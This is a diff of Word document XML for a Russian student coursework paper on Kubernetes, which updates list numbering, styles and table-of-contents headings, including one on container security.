+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="23" w16cid:durableId="1748989788">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="24" w16cid:durableId="1780373040">
+    <w:abstractNumId w:val="25"/>
+  </w:num>
+  <w:num w:numId="25" w16cid:durableId="1449549874">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="26" w16cid:durableId="402526936">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="27" w16cid:durableId="1441687026">
+    <w:abstractNumId w:val="16"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="12"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="28" w16cid:durableId="1813787601">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="29" w16cid:durableId="993676681">
+    <w:abstractNumId w:val="16"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="2"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="30" w16cid:durableId="1516841634">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="31" w16cid:durableId="1020006397">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="32" w16cid:durableId="598296271">
     <w:abstractNumId w:val="13"/>
   </w:num>
-  <w:num w:numId="24" w16cid:durableId="1780373040">
-    <w:abstractNumId w:val="22"/>
+  <w:num w:numId="33" w16cid:durableId="1896232310">
+    <w:abstractNumId w:val="3"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="34" w16cid:durableId="529030099">
+    <w:abstractNumId w:val="3"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
   </w:num>
   <w:numIdMacAtCleanup w:val="18"/>
 </w:numbering>
@@ -8895,10 +10039,10 @@
     <w:link w:val="Heading1Char"/>
     <w:uiPriority w:val="99"/>
     <w:qFormat/>
-    <w:rsid w:val="005306E7"/>
+    <w:rsid w:val="00403A26"/>
     <w:pPr>
       <w:numPr>
-        <w:numId w:val="2"/>
+        <w:numId w:val="28"/>
       </w:numPr>
       <w:outlineLvl w:val="0"/>
     </w:pPr>
@@ -8915,12 +10059,14 @@
     <w:link w:val="Heading2Char"/>
     <w:uiPriority w:val="99"/>
     <w:qFormat/>
-    <w:rsid w:val="005306E7"/>
+    <w:rsid w:val="00403A26"/>
     <w:pPr>
       <w:keepNext/>
       <w:numPr>
-        <w:numId w:val="23"/>
+        <w:ilvl w:val="1"/>
+        <w:numId w:val="28"/>
       </w:numPr>
+      <w:ind w:left="0" w:firstLine="0"/>
       <w:outlineLvl w:val="1"/>
     </w:pPr>
     <w:rPr>
@@ -8940,7 +10086,7 @@
     <w:pPr>
       <w:numPr>
         <w:ilvl w:val="2"/>
-        <w:numId w:val="2"/>
+        <w:numId w:val="28"/>
       </w:numPr>
       <w:outlineLvl w:val="2"/>
     </w:pPr>
@@ -8977,7 +10123,7 @@
       <w:keepLines/>
       <w:numPr>
         <w:ilvl w:val="4"/>
-        <w:numId w:val="2"/>
+        <w:numId w:val="28"/>
       </w:numPr>
       <w:spacing w:before="40"/>
       <w:outlineLvl w:val="4"/>
@@ -8996,7 +10142,7 @@
       <w:keepNext/>
       <w:numPr>
         <w:ilvl w:val="5"/>
-        <w:numId w:val="2"/>
+        <w:numId w:val="28"/>
       </w:numPr>
       <w:jc w:val="center"/>
       <w:outlineLvl w:val="5"/>
@@ -9021,7 +10167,7 @@
       <w:keepLines/>
       <w:numPr>
         <w:ilvl w:val="6"/>
-        <w:numId w:val="2"/>
+        <w:numId w:val="28"/>
       </w:numPr>
       <w:spacing w:before="40"/>
       <w:outlineLvl w:val="6"/>
@@ -9048,7 +10194,7 @@
       <w:keepLines/>
       <w:numPr>
         <w:ilvl w:val="7"/>
-        <w:numId w:val="2"/>
+        <w:numId w:val="28"/>
       </w:numPr>
       <w:spacing w:before="40"/>
       <w:outlineLvl w:val="7"/>
@@ -9075,7 +10221,7 @@
       <w:keepLines/>
       <w:numPr>
         <w:ilvl w:val="8"/>
-        <w:numId w:val="2"/>
+        <w:numId w:val="28"/>
       </w:numPr>
       <w:spacing w:before="40"/>
       <w:outlineLvl w:val="8"/>
@@ -9162,7 +10308,7 @@
     <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
-    <w:rsid w:val="0063672A"/>
+    <w:rsid w:val="006757AF"/>
     <w:pPr>
       <w:tabs>
         <w:tab w:val="left" w:pos="284"/>
@@ -9312,7 +10458,7 @@
     <w:aliases w:val="Заголовок раздела Char,H1 Char,Заголовок 1 уровень Char,1 УРОВЕНЬ Char,Знак Знак Char,Знак3 Char"/>
     <w:link w:val="Heading1"/>
     <w:uiPriority w:val="99"/>
-    <w:rsid w:val="005306E7"/>
+    <w:rsid w:val="00403A26"/>
     <w:rPr>
       <w:b/>
       <w:caps/>
@@ -9343,7 +10489,7 @@
     <w:aliases w:val="H2 Char"/>
     <w:link w:val="Heading2"/>
     <w:uiPriority w:val="99"/>
-    <w:rsid w:val="005306E7"/>
+    <w:rsid w:val="00403A26"/>
     <w:rPr>
       <w:rFonts w:cs="Arial"/>
       <w:b/>
@@ -9360,9 +10506,11 @@
     <w:basedOn w:val="Normal"/>
     <w:uiPriority w:val="34"/>
     <w:qFormat/>
-    <w:rsid w:val="00D00A27"/>
+    <w:rsid w:val="008C133A"/>
     <w:pPr>
-      <w:ind w:left="720"/>
+      <w:numPr>
+        <w:numId w:val="31"/>
+      </w:numPr>
       <w:contextualSpacing/>
     </w:pPr>
   </w:style>
@@ -9747,6 +10895,51 @@
       <w:sz w:val="22"/>
       <w:szCs w:val="22"/>
       <w:lang w:eastAsia="en-US"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Beginingtitlelist">
+    <w:name w:val="Begining title list"/>
+    <w:basedOn w:val="Heading1"/>
+    <w:next w:val="Normal"/>
+    <w:qFormat/>
+    <w:rsid w:val="006757AF"/>
+    <w:pPr>
+      <w:numPr>
+        <w:numId w:val="30"/>
+      </w:numPr>
+    </w:pPr>
+    <w:rPr>
+      <w:caps w:val="0"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Numeredlistparagraph">
+    <w:name w:val="Numered list paragraph"/>
+    <w:next w:val="Normal"/>
+    <w:qFormat/>
+    <w:rsid w:val="00F76F59"/>
+    <w:pPr>
+      <w:numPr>
+        <w:numId w:val="32"/>
+      </w:numPr>
+      <w:jc w:val="both"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:cs="Courier New"/>
+      <w:b/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="IntenseEmphasis">
+    <w:name w:val="Intense Emphasis"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="21"/>
+    <w:qFormat/>
+    <w:rsid w:val="00F76F59"/>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="5B9BD5" w:themeColor="accent1"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/CW/OS/Курсовая_ОС_Kubernetes_Михайлич.docx
+++ b/CW/OS/Курсовая_ОС_Kubernetes_Михайлич.docx
@@ -840,51 +840,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc518292914"/>
-      <w:bookmarkStart w:id="2" w:name="_Toc210601672"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>С</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Heading1Char"/>
-        </w:rPr>
-        <w:t>ОДЕРЖАН</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>ИЕ</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="1"/>
-      <w:bookmarkEnd w:id="2"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="TOC1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
       <w:r>
@@ -893,7 +859,7 @@
       <w:r>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:hyperlink w:anchor="_Toc210601672" w:history="1">
+      <w:hyperlink w:anchor="_Toc231073598" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -920,7 +886,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601672 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073598 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -957,11 +923,12 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601673" w:history="1">
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073599" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -988,7 +955,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601673 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073599 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1025,11 +992,12 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601674" w:history="1">
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073603" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1042,18 +1010,18 @@
           <w:rPr>
             <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
             <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
+            <w:kern w:val="2"/>
+            <w:sz w:val="24"/>
+            <w14:ligatures w14:val="standardContextual"/>
           </w:rPr>
           <w:tab/>
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:szCs w:val="28"/>
-          </w:rPr>
-          <w:t>Теоретические исследования</w:t>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>ТЕОРЕТИЧЕСКИЕ ИССЛЕДОВАНИЯ</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1074,7 +1042,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601674 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073603 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1111,12 +1079,14 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601675" w:history="1">
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073604" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1128,9 +1098,11 @@
           <w:rPr>
             <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
             <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
+            <w:kern w:val="2"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
             <w:lang w:eastAsia="ru-RU"/>
+            <w14:ligatures w14:val="standardContextual"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1139,7 +1111,44 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Подраздел 1</w:t>
+          <w:t>П</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>оня</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve">тие </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>K</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>uberntets</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve"> и назначение оркестровки</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1160,7 +1169,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601675 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073604 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1197,12 +1206,14 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601676" w:history="1">
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073605" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1214,9 +1225,11 @@
           <w:rPr>
             <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
             <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
+            <w:kern w:val="2"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
             <w:lang w:eastAsia="ru-RU"/>
+            <w14:ligatures w14:val="standardContextual"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1225,7 +1238,15 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Подраздел 2</w:t>
+          <w:t xml:space="preserve">архитектура </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>Kubernetes</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1246,7 +1267,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601676 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073605 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1283,12 +1304,14 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601677" w:history="1">
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073606" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1300,9 +1323,11 @@
           <w:rPr>
             <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
             <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
+            <w:kern w:val="2"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
             <w:lang w:eastAsia="ru-RU"/>
+            <w14:ligatures w14:val="standardContextual"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1311,7 +1336,15 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Подраздел 3</w:t>
+          <w:t xml:space="preserve">Основные компоненты </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>Kubernetes</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1332,7 +1365,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601677 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073606 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1365,118 +1398,133 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC3"/>
+        <w:pStyle w:val="TOC2"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601678" w:history="1">
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073617" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
+          </w:rPr>
+          <w:t>1.4</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:noProof/>
+            <w:kern w:val="2"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:lang w:eastAsia="ru-RU"/>
+            <w14:ligatures w14:val="standardContextual"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve">Особенности, преимущества и недостатки </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
             <w:lang w:val="en-US"/>
           </w:rPr>
-          <w:t>1.3.1</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-            <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
-            <w:lang w:eastAsia="ru-RU"/>
+          <w:t>Kubernetes</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
           </w:rPr>
           <w:tab/>
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Подраздел 3 уровня 1</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:tab/>
+          <w:fldChar w:fldCharType="begin"/>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073617 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601678 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
+          <w:t>6</w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>5</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
           <w:fldChar w:fldCharType="end"/>
         </w:r>
       </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC3"/>
+        <w:pStyle w:val="TOC2"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601679" w:history="1">
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073618" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
             <w:lang w:val="en-US"/>
           </w:rPr>
-          <w:t>1.3.2</w:t>
+          <w:t>1.5</w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
             <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
+            <w:kern w:val="2"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
             <w:lang w:eastAsia="ru-RU"/>
+            <w14:ligatures w14:val="standardContextual"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1485,7 +1533,15 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Подраздел 3 уровня 2</w:t>
+          <w:t xml:space="preserve">Существующие аналоги </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>kubernetes</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1506,7 +1562,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601679 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073618 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1526,7 +1582,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>5</w:t>
+          <w:t>8</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1539,29 +1595,34 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC1"/>
+        <w:pStyle w:val="TOC2"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601680" w:history="1">
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073619" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>2</w:t>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>1.6</w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
             <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
+            <w:kern w:val="2"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:lang w:eastAsia="ru-RU"/>
+            <w14:ligatures w14:val="standardContextual"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1570,7 +1631,14 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Раздел 2</w:t>
+          <w:t>В</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>опросы безопасности контейнеризации</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1591,7 +1659,7 @@
